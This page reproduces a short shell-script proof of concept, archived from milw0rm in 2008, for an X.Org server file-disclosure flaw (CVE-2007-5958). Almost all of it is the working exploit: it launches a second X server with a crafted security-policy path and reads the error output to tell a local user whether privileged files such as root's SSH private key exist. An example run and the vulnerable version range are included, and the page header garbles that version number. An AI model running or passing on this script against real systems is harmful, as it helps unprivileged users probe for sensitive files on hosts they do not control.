X.Org xorgserver 1.1.148.13 Probe for Files Exploit PoC by h3m4n

VIEWS: 24 PAGES: 1

									                                   X.Org xorgserver 1.1.148.13 Probe for Files Exploit PoC   Page 1/1
  1     #!/bin/sh
  2     # Xorg file disclosure vulnerability (CVE−2007−5958)
  3     #
  4     # Lame xploit by vl4dZ :))
  5     #
  6     # sh−3.1$ whoami
  7     # uid=1001(kecos) gid=1001(user) groups=1001(user)
  8     # sh−3.1$ ./Xorg−File−Existence−PoC.sh /root/.ssh/id_dsa
  9     # ...
  10    # *** FILE /root/.ssh/id_dsa EXIST !! ***
  11
  12    # Vulnerable: xorg−server <= 1.1.1−48.13
  13
  14    X_EXEC=/usr/bin/X
  15    TMP_FILE=/tmp/X.$$
  16
  17    if [ "$1" = "" ]; then
  18       echo "usage: $0 <file>"
  19       exit 1
  20    fi
  21
  22    [ −f ${X_EXEC} ] || (echo "${X_EXEC} not found"; exit 1)
  23
  24    echo   −e "\n** Xorg file disclosure vulnerability PoC (CVE−2007−5958) **\n"
  25    echo   "A second X server is going to be started, once started, type the "
  26    echo   "ctrl+Alt+Backspace sequence and you’ll see the result of your request."
  27    echo   −en "\nType [Enter] to start: "; read
  28
  29    LANG=c ${X_EXEC} :1 −ac −sp $1 2> ${TMP_FILE}
  30
  31    grep "error opening security policy file" ${TMP_FILE} >/dev/null
  32    if [ $? != 0 ]; then
  33       echo "*** FILE $1 EXIST !! ***"
  34    else
  35       echo "*** FILE $1 DOES NOT EXIST !! ***"
  36    fi
  37    rm −f ${TMP_FILE}
  38
  39    echo −e "\nCtrl−C to quit."
  40    sleep 500
  41
  42    # milw0rm.com [2008−02−19]




vl4dZ                                                                                        02/19/2008

								
To top